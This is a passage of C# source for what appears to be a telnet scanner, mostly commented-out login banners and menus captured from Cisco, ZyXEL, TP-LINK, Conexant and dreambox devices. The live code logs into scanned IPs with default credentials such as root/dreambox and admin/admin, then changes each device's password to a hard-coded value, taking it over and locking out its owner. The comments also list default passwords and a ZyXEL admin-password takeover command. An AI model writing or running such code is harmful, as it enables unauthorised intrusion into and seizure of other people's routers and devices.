                //User Access Verification

                //Password: 1234
                //GPBM>help
                //Help may be requested at any point in a command by entering
                //a question mark '?'.  If nothing matches, the help list will
                //be empty and you must backup until entering a '?' shows the
                //available options.
                //Two styles of help are provided:
                //1. Full help is available when you are ready to enter a
                //   command argument (e.g. 'show ?') and describes each possible
                //   argument.
                //2. Partial help is provided when an abbreviated argument is entered
                //   and you want to know what arguments match the input
                //   (e.g. 'show pr?'.)

                //GPBM>
                //GPBM>?
                //Exec commands:
                //  <1-99>           Session number to resume
                //  access-enable    Create a temporary Access-List entry
                //  access-profile   Apply user-profile to interface
                //  clear            Reset functions
                //  connect          Open a terminal connection
                //  disable          Turn off privileged commands
                //  disconnect       Disconnect an existing network connection
                //  enable           Turn on privileged commands
                //  exit             Exit from the EXEC
                //  help             Description of the interactive help system
                //  lock             Lock the terminal
                //  login            Log in as a particular user
                //  logout           Exit from the EXEC
                //  name-connection  Name an existing network connection
                //  pad              Open a X.29 PAD connection
                //  ping             Send echo messages
                //  ppp              Start IETF Point-to-Point Protocol (PPP)
                //  resume           Resume an active network connection
                //  rlogin           Open an rlogin connection
                //  set              Set system parameter (not config)
                //  show             Show running system information
                //  slip             Start Serial-line IP (SLIP)
                //  systat           Display information about terminal lines
                //  telnet           Open a telnet connection
                //  terminal         Set terminal line parameters
                //  traceroute       Trace route to destination
                //  tunnel           Open a tunnel connection
                //  where            List active connections
                //  x28              Become an X.28 PAD
                //  x3               Set X.3 parameters on PAD

                //GPBM>

                //GPBM>ping 8.8.8.8

                //Type escape sequence to abort.
                //Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
                //!!!!!
                //Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
                //GPBM>

                //GPBM>show ?
                  //backup         Backup status
                  //c1700          Show c1700 information
                  //cca            CCA information
                  //cdapi          CDAPI information
                  //class-map      Show QoS Class Map
                  //clock          Display the system clock
                  //compress       Show compression statistics
                  //dialer         Dialer parameters and statistics
                  //exception      exception informations
                  //flash:         display information about flash: file system

                  //history        Display the session command history
                  //hosts          IP domain-name, lookup style, nameservers, and host table
                  //isdn           ISDN information
                  //location       Display the system location
                  //modemcap       Show Modem Capabilities database
                  //policy-map     Show QoS Policy Map
                  //ppp            PPP parameters and statistics
                  //queue          Show queue contents
                  //queueing       Show queueing configuration
                  //radius         Shows radius information
                  //rmon           rmon statistics
                  //rtr            Response Time Reporter (RTR)
                  //sessions       Information about Telnet connections
                  //snmp           snmp statistics
                  //tacacs         Shows tacacs+ server statistics
                  //template       Template information
                  //terminal       Display terminal configuration parameters
                  //traffic-shape  traffic rate shaping configuration
                  //users          Display information about terminal lines
                  //version        System hardware and software status

                //GPBM>show version
                //Cisco Internetwork Operating System Software
                //IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
                //Copyright (c) 1986-2000 by cisco Systems, Inc.
                //Compiled Tue 14-Mar-00 16:40 by cmong
                //Image text-base: 0x80008088, data-base: 0x805B7EE0

                //ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)

                //GPBM uptime is 5 weeks, 6 days, 45 minutes
                //System returned to ROM by power-on
                //System image file is "flash:c1700-y-mz.121-1"

                //cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
                //.
                //Processor board ID JAD04180989 (362865562), with hardware revision 0000
                //M860 processor: part number 0, mask 32
                //Bridging software.
                //X.25 software, Version 3.0.0.
                //Basic Rate ISDN software, Version 1.1.
                //1 FastEthernet/IEEE 802.3 interface(s)
                //1 Serial(sync/async) network interface(s)
                //1 ISDN Basic Rate interface(s)
                //32K bytes of non-volatile configuration memory.
                //4096K bytes of processor board System flash (Read/Write)

                //Configuration register is 0x2102

                //GPBM>show diag
                //Slot 0:
                //        C1720 1FE Mainboard Port adapter, 3 ports
                //        Port adapter is analyzed
                //        Port adapter insertion time unknown
                //        EEPROM contents at hardware discovery:
                //        Hardware Revision        : 5.1
                //        PCB Serial Number        : JAD04180989
                //        Part Number              : 73-3201-05
                //        Board Revision           : 70
                //        Fab Version              : 04
                //        EEPROM format version 4
                //        EEPROM contents (hex):
                //          0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
                //          0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
                //          0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF

                //        WIC Slot 0:
                //        Serial 1T WAN daughter card
                //        Hardware revision 1.0   Board revision H0
                //        Serial number     0018074153    Part number    800-01514-01
                //        Test history      0x00          RMA number     00-00-00
                //        Connector type    WAN Module
                //        EEPROM format version 1
                //        EEPROM contents (hex):
                //        0x20:   01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
                //        0x30:   88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF

                //        WIC Slot 1:
                //        BRI S/T - 2186 WAN daughter card
                //        Hardware revision 1.3   Board revision A0
                //        Serial number     0019915070    Part number    800-01833-03
                //        Test history      0x00          RMA number     00-00-00
                //        Connector type    WAN Module
                //        EEPROM format version 1
                //        EEPROM contents (hex):
                //        0x20:   01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
                //        0x30:   50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF




                //************************************************************************************
                //-----------------------------------------------------------------------
                //Cisco Router and Security Device Manager (SDM) is installed on this device.
                //This feature requires the one-time use of the username "cisco"
                //with the password "cisco". The default username and password have a privilege le
                //vel of 15.

                //Please change these publicly known initial credentials using SDM or the IOS CLI.

                //Here are the Cisco IOS commands.

                //username <myuser>  privilege 15 secret 0 <mypassword>
                //no username cisco

                //Replace <myuser> and <mypassword> with the username and password you want to use
                //.

                //For more information about SDM please follow the instructions in the QUICK START

                //GUIDE for your router or go to http://www.cisco.com/go/sdm
                //-----------------------------------------------------------------------


                //User Access Verification

                //Username: cisco
                //Password:
                //% Login invalid


                //************************************************************************************                
                //BCM96338 ADSL Router
                //Login: bad
                //Password:
                //Login incorrect. Try again.
                //Login: admin
                //Password: password

                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   Main Menu

                //1.  ADSL Link State
                //2.  LAN
                //3.  WAN
                //4.  DNS Server
                //5.  Route Setup
                //6.  NAT
                //7.  Firewall
                //8.  Quality Of Service
                //9.  Management
                //10. Passwords
                //11. Diag
                //12. Reset to Default
                //13. Save and Reboot
                //14. Exit
                // ->

                //(10)

                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   Password Menu

                //1. Admin
                //2. User
                //3. Support
                //4. Exit
                ///Passwords ->

                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   Password Menu

                //1. Admin
                //2. User
                //3. Support
                //4. Exit
                ///Passwords -> 1

                //        Password Configuration Menu For User admin

                //Note: Maximum length of password is 16 characters.
                //Old password        :
                //New password        :
                //Confirm new password:
                //Password for admin changed successfully.

                //Hit <enter> to continue


                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   DNS Menu

                //1. Configure
                //2. Show
                //3. Exit
                /// DNS Server -> 2

                //Automatic assigned IP address for DNS is enabled.
                //Primary DNS  : 62.251.229.237
                //Secondary DNS: 62.251.229.223

                //Hit <enter> to continue


                //14. Exit
                // -> 14

                //Bye bye. Have a nice day!!!


                //Perte de la connexion à l'hôte.


                //************************************************************************************ 
                //Password: 1234
                //                    Copyright (c) 1994 - 2003 ZyXEL Communications Corp.

                         //                         Prestige 650R-E1 Main Menu
                //                          Prestige 645 Main Menu

                         //Getting Started                      Advanced Management
                         //  1. General Setup                     21. Filter Set Configuration
                         //  3. LAN Setup                         22. SNMP Configuration
                         //  4. Internet Access Setup             23. System Password
                         //                                       24. System Maintenance
                         //Advanced Applications                  25. IP Routing Policy Setup
                         //  11. Remote Node Setup                26. Schedule Setup
                         //  12. Static Routing Setup
                         //  15. NAT Setup
                         //                                       99. Exit






                         //                     Enter Menu Selection Number:

                //(23)
                //

                                        //        Menu 23 - System Password

                                        //Old Password= ?
                                        //New Password= ?
                                        //Retype to confirm= ?













                                        // Enter here to CONFIRM or ESC to CANCEL:



                //

                    //     Menu 4 - Internet Access Setup

                    //ISP's Name= MyISP
                    //Encapsulation= PPPoE
                    //Multiplexing= LLC-based
                    //VPI #= 8
                    //VCI #= 35
                    //ATM QoS Type= UBR
                    //  Peak Cell Rate (PCR)= 0
                    //  Sustain Cell Rate (SCR)= 0
                    //  Maximum Burst Size (MBS)= 0
                    //My Login= saidi_im
                    //My Password= ********
                    //Idle Timeout (sec)= 0
                    //IP Address Assignment= Dynamic
                    //  IP Address= N/A
                    //Network Address Translation= SUA Only
                    //  Address Mapping Set= N/A

                    //Press ENTER to Confirm or ESC to Cancel:


                //************************************************************************************             
                //Password: 1234

                //                    Copyright (c) 1994 - 2004 ZyXEL Communications Corp.

                         //                         Prestige 660HW-61 Main Menu

                         //Getting Started                      Advanced Management
                         //  1. General Setup                     21. Filter Set Configuration
                         //  2. WAN Backup Setup                  22. SNMP Configuration
                         //  3. LAN Setup                         23. System Security
                         //  4. Internet Access Setup             24. System Maintenance
                         //                                       25. IP Routing Policy Setup
                         //Advanced Applications                  26. Schedule Setup
                         //  11. Remote Node Setup
                         //  12. Static Routing Setup
                         //  14. Dial-in User Setup               99. Exit
                         //  15. NAT Setup





                         //                     Enter Menu Selection Number:

                //(23)

                //

                    //        Menu 23 - System Security

                    //1. Change Password
                    //2. RADIUS Server

                    //4. IEEE802.1x

                //(1)
                //
                 //Menu 23.1 - System Security - Change Password

                 //  Old Password= ?
                 //  New Password= ?
                 //  Retype to confirm= ?













                 //   Enter here to CONFIRM or ESC to CANCEL:










                    //      Enter Menu Selection Number:



                //************************************************************************************
                //(Cisco router)
                //User Access Verification

                //Username: bad
                //Password:
                //% Login invalid

                //Username: admin
                //Password:
                //% Login invalid

                //Username: admin
                //Password:
                //% Login invalid


                //Perte de la connexion à l'hôte.


                //************************************************************************************
                //**************************
                //*                        *
                //*   The Gemini Project   *
                //*                        *
                //**************************

                //welcome on your dreambox! - Kernel 2.6.9 (09:30:19).

                //dreambox login: root
                //Password:


                //BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
                //Enter 'help' for a list of built-in commands.

                //root@dreambox:~>
                //root@dreambox:~> help
                //
                //Built-in commands:
                //-------------------
                //        . : alias bg break cd chdir command continue eval exec exit export
                //        false fg getopts hash help jobs kill let local pwd read readonly
                //        return set shift times trap true type ulimit umask unalias unset
                //        wait
                //root@dreambox:~> passwd
                //Changing password for root
                //Enter the new password (minimum of 5, maximum of 8 characters)
                //Please use a combination of upper and lower case letters and numbers.
                //Enter new password:
                //Re-enter new password:
                //Password changed.
                //root@dreambox:~>
                //root@dreambox:~>
                //\[                  fusermount          mkdir               start-stop-daemon
                //ash                 gbox                mknod               streampes
                //automount           gbox.ver            mkswap              streamripper
                //awk                 gdaemon             mmi.socket          streamsec
                //basename            gdaemon.socket      more                streamts
                //boot                grep                mount               stty
                //bunzip2             gunzip              mv                  su
                //busybox             gzip                nc                  swapoff
                //bzcat               halt                netstat             swapon
                //cat                 hdparm              nslookup            sync
                //chgrp               head                online.log          syslogd
                //chmod               hostname            passwd              tail
                //chown               hotplug             pid.info            tar
                //chroot              hotplug.socket      pidof               telnet
                //clear               httpd               ping                telnetd
                //cp                  id                  pmt.tmp             test
                //date                ifconfig            poweroff            top
                //dd                  in.ftpd             prockill            touch
                //df                  in.telnetd          ps                  true
                //dmesg               inadyn              pwd                 tty
                //dos2unix            inetd               rdate               udhcpc
                //dropbear            init                reboot              udpstreampes
                //dropbearkey         insmod              reset               umount
                //dropbearmulti       kill                rm                  uname
                //du                  killall             rmdir               uniq
                //dvbnet              klogd               rmmod               unix2dos
                //echo                lcdoff              route               uptime
                //enigma              lcdstuff            sc.info             usleep
                //enigmanet           ln                  sc01.info           vi
                //env                 loadkmap            scp                 wc
                //eraseall            logger              sed                 wget
                //etherwake           login               sh                  which
                //expr                logread             showlogo            whoami
                //false               losetup             sleep               xargs
                //find                ls                  smbmnt              yes
                //flashtool           lsmod               smbmount            zcat
                //free                md5sum              sort
                //************************************************************************************

                #endregion

                if (banner.Contains("dreambox"))
                {
                    //dreambox login:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
                    //Password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
                }
                else
                {   //Vulcan
                    //login:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
                    //password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
                }
                //      cisco/cisco
                recv = Sock_scan.Receive(data);
                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
                //Login Successful

                //login:
                if(stringdata.Contains("ogin:"))
                {
                    Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
                }
                else
                {
                    //$
                    //$passwd
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
                    if (banner.Contains("Vulcan"))
                    {
                        //Enter Old Password:       
                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                        recv = Sock_scan.Receive(data);
                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
                    }
                    else
                    {
                        //On a pas cette ligne sur une BusyBox ou une dreambox
                    }
                    //Enter New Password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
                    //Confirm New Password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);                
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
                    //Login incorrect   (dreambox)

                    //Password changed

                    //Set Done
                    //SINON:    Erreur: Combinaison nom utilisateur/mot de passe invalide

                    //passwd: An error occurred updating the password file.     //BusyBox
                }
                //login:

                Sock_scan.Close();
            }

                if (banner.Contains("assword:"))
                {
                    #region BANNERS
                    //********************************************************
                    //Info:Connection was denied by remote host according to ACL!

                    //********************************************************
                    //Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
                    //admin
                    //Valid commands are:
                    //sys             exit            ether           wan
                    //ip              bridge          dot1q           pktqos
                    //show            set             lan
                    
                    //********************************************************
                    //Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
                    //1234
                    //Valid commands are:
                    //sys             exit            ether           wan
                    //etherdbg        usb             ip              bridge
                    //dot1q           pktqos          show            set
                    //lan
                    //
                    //tc> sys countrycode
                    //country code = 253                //Djibouti
                    
                    //********************************************************
                    //                         *******************
                    //                         Welcome to Vulcan
                    //                         *******************

                    //Conexant Inc., Software Release 3.C10MTT0.8822A
                    //Copyright (c) 2001-2003 by Conexant, Inc.

                    //login:
                    //admin
                    
                    //password:
                    //admin
                    //Login Successful
                    //$
                    //$help
                    //Command        Description
                    //-------        -----------
                    //alias          To Alias a command
                    //apply          Apply configuration/image file
                    //commit         Commit the active config to the flash
                    //create         Create a new entry of specified type
                    //delete         Delete the specified entry
                    //download       Download a file on to the Device
                    //exit           To exit the CLI shell
                    //get            Display info for the search
                    //help           Provides help
                    //list           List files
                    //modify         Modify information for specified entry
                    //passwd         To modify user password
                    //ping           The normal ping command
                    //prompt         Change the user prompt
                    //reboot         Reboot the device
                    //remove         Remove file
                    //reset          Reset info for the specified entry
                    //size           ATM Sizing Information
                    //traceroute     The normal traceroute command
                    //trigger        To set trigger
                    //unalias        To undefine previously defined alias
                    //verbose        Switch ON/OFF the verbose mode


                    //********************************************************
                    //Password: 1234
                    //Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
                    //ras>
                    //ras> help
                    //Valid commands are:
                    //sys             exit            ether           wan
                    //aux             wlan            ip              ipsec
                    //bridge          certificates    bm              lan
                    //vlan            radius          8021x           autoSec
                    //ras> sys
                    //packetscan      adjtime         callhist        countrycode
                    //date            domainname      edit            extraphnum
                    //feature         firewall        myZyxelCom      hostname
                    //logs            stdio           datetime        time
                    //tos             trcdisp         trclog          trcpacket
                    //version         view            wdog            romreset
                    //upnp            atsh            atmu            ateb
                    //xmodemmode      diag            save            display
                    //adminPassword   userPassword    default         fwnotify
                    //tripleplay      general         socket          filter
                    //ddns            cpu             winmes          snmp
                    //ras> sys adminPassword
                    //Usage: adminPassword <new adminPassword>
                    //ras> sys adminPassword j3R0m3!!

                    /*
                                        Copyright (c) 1994 - 2003 ZyXEL Communications Corp.

                                                  Prestige 650R-E1 Main Menu

                         Getting Started                      Advanced Management
                           1. General Setup                     21. Filter Set Configuration
                           3. LAN Setup                         22. SNMP Configuration
                           4. Internet Access Setup             23. System Password
                                                                24. System Maintenance
                         Advanced Applications                  25. IP Routing Policy Setup
                           11. Remote Node Setup                26. Schedule Setup
                           12. Static Routing Setup
                           15. NAT Setup
                                                                99. Exit






                                              Enter Menu Selection Number:
                    */
                    /*
                                                 Menu 1 - General Setup

                    System Name= ?
                    Location=
                    Contact Person's Name=
                    Domain Name=
                    Edit Dynamic DNS= No

                    Route IP= Yes
                    Bridge= No








                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                    

                            Menu 23 - System Password

                    Old Password= ?
                    New Password= ?
                    Retype to confirm= ?













                     Enter here to CONFIRM or ESC to CANCEL:
                    */
                    /*
                                                   Menu 3 - LAN Setup

                    1. LAN Port Filter Setup
                    2. TCP/IP and DHCP Setup














                          Enter Menu Selection Number:
                    */
                    /*
                                            Menu 3.1 - LAN Port Filter Setup

                    Input Filter Sets:
                      protocol filters=
                      device filters=
                    Output Filter Sets:
                      protocol filters=
                      device filters=
                    */
                    /*
                                            Menu 3.2 - TCP/IP and DHCP Setup

                    DHCP Setup
                      DHCP= Server
                      Client IP Pool Starting Address= 192.168.1.33
                      Size of Client IP Pool= 32
                      Primary DNS Server= 0.0.0.0
                      Secondary DNS Server= 0.0.0.0
                      Remote DHCP Server= N/A
                    TCP/IP Setup:
                      IP Address= 192.168.1.1
                      IP Subnet Mask= 255.255.255.0
                      RIP Direction= Both
                        Version= RIP-2B
                      Multicast= None
                      IP Policies=
                      Edit IP Alias= No

                    Press ENTER to Confirm or ESC to Cancel:

Press Space Bar to Toggle.
                    */
                    /*
                                             Menu 4 - Internet Access Setup

                    ISP's Name= MyISP
                    Encapsulation= PPPoE
                    Multiplexing= LLC-based
                    VPI #= 8
                    VCI #= 35
                    ATM QoS Type= UBR
                      Peak Cell Rate (PCR)= 0
                      Sustain Cell Rate (SCR)= 0
                      Maximum Burst Size (MBS)= 0
                    My Login= zemzem2
                    My Password= ********
                    Idle Timeout (sec)= 0
                    IP Address Assignment= Dynamic
                      IP Address= N/A
                    Network Address Translation= SUA Only
                      Address Mapping Set= N/A

                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                               Menu 11 - Remote Node Setup

                     1. MyISP (ISP, SUA)
                     2. ________
                     3. ________
                     4. ________
                     5. ________
                     6. ________
                     7. ________
                     8. ________








                              Enter Node # to Edit:
                    */
                    /*
                                             Menu 11.1 - Remote Node Profile

     Rem Node Name= MyISP                 Route= IP
     Active= Yes                          Bridge= No

     Encapsulation= PPPoE                 Edit IP/Bridge= No
     Multiplexing= LLC-based              Edit ATM Options= No
     Service Name= zyxel
     Incoming:                            Telco Option:
       Rem Login=                           Allocated Budget(min)= 0
       Rem Password= ********               Period(hr)= 0
     Outgoing:                              Schedule Sets=
       My Login= zemzem2                    Nailed-Up Connection= Yes
       My Password= ********              Session Options:
       Authen= CHAP/PAP                     Edit Filter Sets= No
                                            Idle Timeout(sec)= N/A
                                          Edit Traffic Redirect= No

                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                           Menu 21 - Filter Set Configuration

     Filter                               Filter
     Set #        Comments                Set #        Comments
     ------  -----------------            ------  -----------------
       1      _______________               7      _______________
       2      _______________               8      _______________
       3      _______________               9      _______________
       4      _______________              10      _______________
       5      _______________              11      _______________
       6      _______________              12      _______________



                    Enter Filter Set Number to Configure= 0

                    Edit Comments= N/A

                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                            Menu 21.1 - Filter Rules Summary

 # A Type                       Filter Rules                              M m n
 - - ---- --------------------------------------------------------------- - - -
 1 N
 2 N
 3 N
 4 N
 5 N
 6 N








                  Enter Filter Rule Number (1-6) to Configure:

                    */
                    /*
                                            Menu 21.1.1 - TCP/IP Filter Rule

                   Filter #: 1,1
                   Filter Type= TCP/IP Filter Rule
                   Active= No
                   IP Protocol= 0     IP Source Route= No
                   Destination: IP Addr=
                                IP Mask=
                                Port #=
                                Port # Comp= None
                        Source: IP Addr=
                                IP Mask=
                                Port #=
                                Port # Comp= None
                   TCP Estab= N/A
                   More= No           Log= None
                   Action Matched= Check Next Rule
                   Action Not Matched= Check Next Rule

                   Press ENTER to Confirm or ESC to Cancel:
ress Space Bar to Toggle.
                    */
                    /*
                                              Menu 22 - SNMP Configuration

                  SNMP:
                    Get Community= public
                    Set Community= public
                    Trusted Host= 0.0.0.0
                    Trap:
                      Community= public
                      Destination= 0.0.0.0









                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                              Menu 24 - System Maintenance

                         1.  System Status
                         2.  System Information and Console Port Speed
                         3.  Log and Trace
                         4.  Diagnostic
                         5.  Backup Configuration
                         6.  Restore Configuration
                         7.  Upload Firmware
                         8.  Command Interpreter Mode
                         9.  Call Control
                         10. Time and Date Setting
                         11. Remote Management





                          Enter Menu Selection Number:
                    */
                    /*
                                              Enter Menu Selection Number: 8


Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
ras> help
Valid commands are:
sys             exit            ether           wan
ip              bridge
ras>
                    */
                    /*
                                         Menu 24.11 - Remote Management Control

     TELNET Server:
       Server Port = 23                   Server Access = ALL
       Secured Client IP = 0.0.0.0

     FTP Server:
       Server Port = 21                   Server Access = ALL
       Secured Client IP = 0.0.0.0

     Web Server:
       Server Port = 80                   Server Access = ALL
       Secured Client IP = 0.0.0.0





                    Press ENTER to Confirm or ESC to Cancel:
                    */




                    //********************************************************
                    //**************************
                    //*                        *
                    //*   The Gemini Project   *
                    //*                        *
                    //**************************

                    //welcome on your dreambox! - Kernel 2.6.9 (17:51:55).

                    //dreambox login: admin
                    //Password:
                    //Login incorrect
                    //dreambox login:
                    //
                    //root/dreambox


                    //********************************************************
                    //***************************
                    //*                         *
                    //*   The Gemini Project    *
                    //*                         *
                    //***************************
                    //*   Prepared By "drhg"    *
                    //*  ( Dream-Gaza Team )    *
                    //*   www.dreamgaza.com     *
                    //***************************

                    //Checking Kernel, Please Wait ....

                    //Kernel 2.6.9.
                    //md5sum (dreambox Linux ppc ).
                    //head.ko = 308509 bytes.
                    //Safe, NO 'clone bomb' found ... Congratulations.

                    //Enjoy Original Gemini Project  without Time Bomb !.
                    //---------------------------------------------------

                    //(Friday, 17 September 2010).
                    //welcome on your dreambox! - Kernel 2.6.9 (10:46:22).


                    //dreambox login: bad
                    //Password:
                    //Login incorrect
                    //dreambox login: root
                    //Password:
                    //Login incorrect
                    //dreambox login: root
                    //Password:
                    //Login incorrect

                    //********************************************************
                    //OpenDreambox 1.5.0 dm800

                    //dm800 login:
                    //dm800 login: bad
                    //Password:
                    //Login incorrect
                    //dm800 login: root
                    //root@dm800:~#
                    //CCcam_2011             head                   pyhtmlizer
                    //StartNabCam            hexdump                python
                    //\[                     hostname               rdjpgcom
                    //addgroup               hotplug                readlink
                    //adduser                id                     reboot
                    //ar                     ifconfig               reboot.sysvinit
                    //arping                 ifdown                 renice
                    //ash                    ifup                   reset
                    //automount              im                     rjoe
                    //avahi-daemon           inadyn                 rm
                    //awk                    inadyn_script.sh       rmdir
                    //basename               inetd                  rmmod
                    //bdpoll                 init                   route
                    //bookify                init.sysvinit          rquotad
                    //bunzip2                insmod                 run-parts
                    //busybox                ip                     runlevel
                    //bzcat                  ipkg                   rx
                    //cat                    ipkg-cl                scp
                    //cftp                   ipkg-link              sed
                    //chat                   iwconfig               seq
                    //chgrp                  iwgetid                sfdisk
                    //chmod                  iwlist                 sh
                    //chown                  iwpriv                 sha1sum
                    //chroot                 iwspy                  showiframe
                    //chvt                   jmacs                  showmount
                    //cjpeg                  joe                    shutdown
                    //ckeygen                jpegtran               shutdown.sysvinit
                    //clear                  jpico                  sleep
                    //conch                  jstar                  smartctl
                    //cp                     kill                   smartd
                    //cpio                   killall                smbd
                    //crond                  killall5               sort
                    //crontab                klogd                  ssh
                    //cut                    last                   start-stop-daemon
                    //czap                   last.sysvinit          statd
                    //date                   lastb                  streamproxy
                    //dbclient               ldconfig               strings
                    //dbus-cleanup-sockets   less                   stty
                    //dbus-daemon            lessecho               su
                    //dbus-launch            lesskey                sulogin
                    //dbus-monitor           ln                     swapoff
                    //dbus-send              loadfont               swapon
                    //dbus-uuidgen           loadkmap               sync
                    //dc                     lockd                  sysctl
                    //dccamd                 logger                 syslogd
                    //dd                     login                  szap
                    //deallocvt              logname                t-im
                    //delgroup               logread                tail
                    //deluser                lore                   tap2deb
                    //depmod                 losetup                tap2rpm
                    //depmod.26              ls                     tapconvert
                    //df                     lsmod                  tar
                    //dirname                mailmail               tda1002x
                    //djpeg                  makedevs               tee
                    //dmesg                  manhole                telinit
                    //dos2unix               map-mbone              telnet
                    //dropbear               mc                     telnetd
                    //dropbearconvert        mcedit                 termidx
                    //dropbearkey            mcmfmt                 test
                    //dropbearmulti          mcview                 time
                    //du                     md5sum                 tkconch
                    //dumpkmap               mesg                   top
                    //dvbsnoop               mesg.sysvinit          touch
                    //dvbtraffic             mkdir                  tput
                    //e2fsck                 mke2fs                 tr
                    //echo                   mkfifo                 traceroute
                    //egrep                  mkfs.ext2              trial
                    //enigma2                mkfs.ext3              true
                    //enigma2.sh             mknod                  tset
                    //env                    mkswap                 tty
                    //ethtool                mktap                  tuxtxt
                    //exportfs               mktemp                 twistd
                    //expr                   modprobe               tzap
                    //false                  more                   udhcpc
                    //fbset                  mount                  umount
                    //fdisk                  mountd                 uname
                    //fdisk.util-linux       mountpoint             uniq
                    //femon                  mrinfo                 unix2dos
                    //fgrep                  mrouted                unzip
                    //find                   mv                     update-alternatives
                    //free                   nc                     update-inetd
                    //fsck.ext2              netstat                update-modules
                    //fsck.ext3              nfs_server_script.sh   update-passwd
                    //ftpget                 nfsd                   update-rc.d
                    //ftpput                 nfsstat                uptime
                    //getepgchannels         nhfsgraph              utmpdump
                    //getkey                 nhfsnums               uudecode
                    //getty                  nhfsrun                uuencode
                    //grab                   nhfsstone              vi
                    //grep                   nmbd                   vlock
                    //gst-feedback           nslookup               vsftpd
                    //gst-feedback-0.10      od                     wall
                    //gst-inspect            openvpn                wall.sysvinit
                    //gst-inspect-0.10       openvpn_script.sh      watch
                    //gst-launch             openvt                 wc
                    //gst-launch-0.10        passwd                 wdog
                    //gst-typefind           patch                  wget
                    //gst-typefind-0.10      pidof                  which
                    //gst-visualise-0.10     pidof.sysvinit         who
                    //gst-xmlinspect         ping                   whoami
                    //gst-xmlinspect-0.10    pivot_root             wpa_cli
                    //gst-xmllaunch          poff                   wpa_passphrase
                    //gst-xmllaunch-0.10     pon                    wpa_supplicant
                    //gunzip                 portmap                wrjpgcom
                    //gzip                   poweroff               xargs
                    //halt                   pppd                   yes
                    //halt.sysvinit          printf                 zcat
                    //hddtemp                ps                     zeroconf
                    //hdparm                 pwd
                    //root@dm800:~#
                    //root@dm800:~# passwd
                    //Changing password for root
